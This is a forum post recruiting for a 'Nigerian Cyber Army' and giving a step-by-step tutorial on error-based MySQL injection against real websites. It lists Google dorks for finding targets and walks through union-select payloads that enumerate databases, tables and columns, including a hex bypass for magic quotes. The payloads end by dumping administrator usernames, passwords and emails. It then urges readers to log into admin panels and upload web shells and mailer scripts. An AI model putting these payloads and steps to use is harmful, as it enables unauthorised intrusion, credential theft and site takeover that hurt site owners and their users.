Hello Nigerians, it's time to get serious with H@cking. All this while, we have been killing ourselves with Free Browsing Tricks while other coutries keep I'm Lightangel, a.k.a Darkangel, Demon Hellion and so on. This season, I bring to you, Nigerian Cyber Army. Well, I've not been planning on opening this group but I think someone has already did, but it isn't my problem because that group is not really concerned about H@cking. What happens is that, I will teach you guys how to hack Web Sites, Forums, Using Exploits and lots more. First off, we have to start by Web H@cking and the topic is MySQL Error Based Injection which to most hackers is regarded as basic SQLi. This is what we are going to learn. # Finding vulnerable sites # Finding amount of columns # Getting mysql version current user # Getting Databases # Getting Tables # Getting Columns # Getting Usernames and Passwords 1. Finding vulnerable sites Some Google helpful dorks to find it. Code: inurl:index.php?id= inurl:news.php?id= inurl:category.php?id= inurl:games.php?id= inurl:forum.php?tid= inurl:newsletter.php?id= inurl:content.php?id= trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id= newsid= news_display.php?getid= ages.php?id= clanek.php4?id= review.php?id= iniziativa.php?in= curriculum.php?id= labels.php?id= look.php?ID= galeri_info.php?l= tekst.php?idt= newscat.php?id= newsticker_info.php?idn= rubrika.php?idr= offer.php?idf= They are lots of dork, I will talk about this later. Lets say we have got a site http://site.com/news/view.php?id=828 if we add a ' before or after the numbers it should look something like this if its vulnerable: http://site.com/news/view.php?id=828' or.. http://site.com/news/view.php?id='828 If the web site shows no error, it means it's not vulnerable but if it shows, then it's vulnerable, but you should not that it's not all web site that shows error can be hacked. Most times, some errors that occurs shows like this. Code: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7 or Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1) Any error you encounter, know it's slighty to be vulnerable. # Finding amount of columns To find the amount of columns in the database of the site you want to hack, you need to inject it with the order by query. Since our vuln site is- http://site.com/news/view.php?id=828 We will add order by to see where the vuln columns lies. So we inject like this. In most times, the vuln colums is in the 10th of numbers, I mean, from 10 - 20, so to remove stress from our work, we will need to start from like 20 to show if it's really vulnerbale. http://site.com/news/view.php?id=828 order by 20-- If you see something like this- Unknown column '20' in 'order clause This actually means that column 20 is vulnerable but it's not the last vuln column, so we need to find the exact last vulnerable column and by doing this we need to decrease the column number until it shows no error. So what we will do next is this-- http://site.com/news/view.php?id=828 order by 17-- If it still shows error, we still need to go back.. http://site.com/news/view.php?id=828 order by 15-- (error) and so on... Until, http://site.com/news/view.php?id=828 order by 11-- Now, we tried it download until we got to 'order by 11' and unfortunately we got no error, it really means the column lies there. So, if 'order by 11' got no error and 'order by 12' gets, it actually means the main column is 11. So.. We need to continue injection. Since it has 11 columns, we need to find the vulnerable number(s) among the columns, so this is what we do. We will union select the database and force it to produce the main numbers, and to do that, we need to add (minus) sign "-" after the ?id= or before the numbers after the ?id= http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8,9,10,11-- Now, after this, the site will show some certain numbers in the page, most times, these numbers are 3, but lets take for example we found 5,7,2 in the web page, it actually means those numbers are vulnerable. So, we need to use the numbers to find the version. So, we will add '@@version' or version() to the vulnerable number. Here is how it will be. http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,version(),8,9,10,11-- or... http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,@@version,8,9,10,11-- Yeah, now watch the page as it loads, it will bring up something like this Code: 5.1.47-community-log If its database is 4 or lower it means we have to start going the hard way, I mean, using blind sql and all that. But since most of us are newbies, if it's 4 just leave it and inject another site. Anyway, if the database version doesn't show up, then lets do some small WAF bypassing by adding 'unhex(hex(@@version))'. Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,unhex(hex(@@version)),8,9,10,11-- Heheheh, now, it's still not yet over. Now we need to find the schema name from MySQL DB and to that we need to inject like this. Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(schema_name),8,9,10,11 from information_schema.schemata-- This could sometimes return more results than necessary and so that is when we switch over to this query instead: Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,concat(database()),8,9,10,11-- Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later. And now, this is the fun part where we will find the usernames, emails and passwords! To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on: Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 FROM information_schema.tables WHERE table_schema=database()-- It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()). NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now. Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query: Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1-- Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue You now have all the table names! Finding Column Names Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites. After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"): Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 FROM information_schema.columns WHERE table_name="Admin"-- This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial). UPDATE: If you get an error at this point all you must do is follow these steps: 1. Copy the name of the table that you are trying to access. 2. Paste the name of the table into this website where it says "Say Hello To My Little Friend". Hex/Char Converter http://www.swingnote.com/tools/texttohex.php 3. Click convert. 4. Copy the string of numbers/letters under Hex into your query so it looks like this: Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 FROM information_schema.columns WHERE table_name=0x41646d696e-- Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string. You should now see a list of all the columns within the table such as username, password, and email. NOTE: Using the limit function does work with columns as well. Displaying the column contents Code: http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,group_concat(username,0x3a,password,0x3a,email),8,9,10,11 FROM db123.Admin-- In this query, 0x3a is the hex value of a colon (:) which will group the usernameassword:email for the individual users just like that. FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page and do what's necessary. Use any admin page finder, login, upload shell, then from shell upload IWP script, mailer script, and so on... I'm awating your questions now. Please, admins, kindly stick this thread as I will be very active to moderate it.